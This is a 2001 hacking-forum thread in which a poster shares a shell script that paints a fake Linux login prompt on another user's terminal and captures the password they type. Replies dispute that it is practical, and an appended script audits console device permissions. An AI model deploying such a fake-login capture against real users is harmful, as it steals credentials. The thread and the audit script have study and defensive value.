-
December 3rd, 2001, 04:18 AM
#1
Junior Member
tty hacking (no.. seriously)
You might remember my last thread about tty hacking (http://www.antionline.com/showthread...hreadid=119753). It turned out that didn't work, -lol-. I got really frustrated because many dismissed it as impossible.
There is no way to read back what the other person is typing unless you are the root user and have installed software specifically for that purpose
. aghh! So I hacked around some more because I knew that it worked and I just came up with a foolproof (no pun intended) method. Here's the script (attacker at tty1, victim at tty2):
#this cat is the big moma:
cat /dev/tty2 >/dev/tty1&
CATPID="$!"
echo -ne >/dev/tty2 #misc commands that don't return anything
true >/dev/tty2
false >/dev/tty2
locate dfdsfds >/dev/tty2
locate otherHw >/dev/tty2
#heres the meat:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n' >/dev/tty2
echo -ne '\nlocalhost login: ' >/dev/tty2
sleep 5
#redraw the screen; bash at tty2 doesn't have a clue what is
#going on, so it thinks $USER that the guy at tty2 entered is a
#command:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n\n' >/dev/tty2
echo -ne "localhost login: $USER\n" >/dev/tty2
echo -ne 'Password: '>/dev/tty2
#the stuff entered after password is the only thing that's
#redirected
sleep 5 #give him time to enter his ps
kill -TERM $CATPID #so nothing else gets redirected
Now, 'foolproof' meaning you will get text back after the user enters his username (for some reason, after the cat and misc commands are executed, the user at tty2 must enter a string followed by enter before text gets redirected to tty1; and that's just in time for the ps to be redirected!). Now this script is extremely crappy so don't feel stupid asking if you don't know why it's doing what it does. If I learn real scripting I'll make a better one and put it on here. Cheers
-Ryan
-
December 3rd, 2001, 05:05 PM
#2
Great idea, however you need root access for this to work, and at that point you could just change the password....
[chsh@comp chsh]$ cat /dev/tty2
cat: /dev/tty2: Permission denied
[chsh@comp chsh]$ su root
Password:
[root@comp chsh]# cat /dev/tty2
<I CTRL+C'ed to cancel out after seeing no output>
[root@comp chsh]#
Chris Shepherd
The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?" -- Failed Insult
Is your whole family retarded, or did they just catch it from you?
-
December 3rd, 2001, 06:23 PM
#3
Junior Member
Actually, you need to be the same user as the guy on tty2, or be in the group tty (I believe). But you're sorta right that the hack is useless.
-
December 4th, 2001, 06:18 AM
#4
Originally posted by ryannh@prodigy.
Actually, you need to be the same user as the guy on tty2, or be in the group tty (I believe). But you're sorta right that the hack is useless.
Right, but the idea here is to get rid of the login prompt and replace it with a fake. Only root can monitor the output of non-logged in ttys...
At any rate, it IS useless.
Chris Shepherd
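A defender's check that follows from posts #2 and #4 (whether `cat /dev/tty2` gets "Permission denied" depends entirely on the console device's mode and owning group), added here as an example and not part of the thread: a POSIX sh audit of /dev/ttyN permissions. It assumes GNU stat and the usual Linux layout of owner rw, group tty write-only (mode 620); `tty_mode_risky` and `audit_ttys` are names chosen for this example.

```shell
#!/bin/sh
# Added example (not from the thread): audit the permission bits on the
# virtual console devices. The trick above only works when someone other
# than the owner can read (and write) the victim's /dev/ttyN. Expected
# Linux layout: owner = logged-in user, group = tty, mode 620
# (owner rw, group w for write(1)/wall(1), nothing for others).

# tty_mode_risky OCTAL_MODE GROUP
# Returns 0 (true) when the mode lets someone other than the owner read
# the device, or lets anyone outside the tty group write to it.
tty_mode_risky() {
    mode=$1
    group=$2
    # keep only the last three octal digits (drops a leading 0 or setuid digit)
    mode=${mode#"${mode%???}"}
    grp=$(printf '%s' "$mode" | cut -c2)
    oth=$(printf '%s' "$mode" | cut -c3)
    # "other": any read or write permission is bad
    if [ $((oth & 6)) -ne 0 ]; then
        return 0
    fi
    # group: read is bad regardless; write is only acceptable for group tty
    if [ $((grp & 4)) -ne 0 ]; then
        return 0
    fi
    if [ $((grp & 2)) -ne 0 ] && [ "$group" != "tty" ]; then
        return 0
    fi
    return 1
}

# audit_ttys: walk the consoles, print the ones that fail the check and
# return the number of risky devices (0 means everything looks sane).
# Assumes GNU stat (-c '%a %U %G').
audit_ttys() {
    bad=0
    for dev in /dev/tty[0-9]*; do
        [ -c "$dev" ] || continue
        info=$(stat -c '%a %U %G' "$dev" 2>/dev/null) || continue
        set -- $info
        [ -n "$1" ] || continue
        if tty_mode_risky "$1" "$3"; then
            echo "RISKY: $dev mode=$1 owner=$2 group=$3"
            bad=$((bad + 1))
        fi
    done
    return "$bad"
}
```

Run `audit_ttys` as any user; a clean box prints nothing and exits 0, while a console readable by others or by a group other than tty is listed.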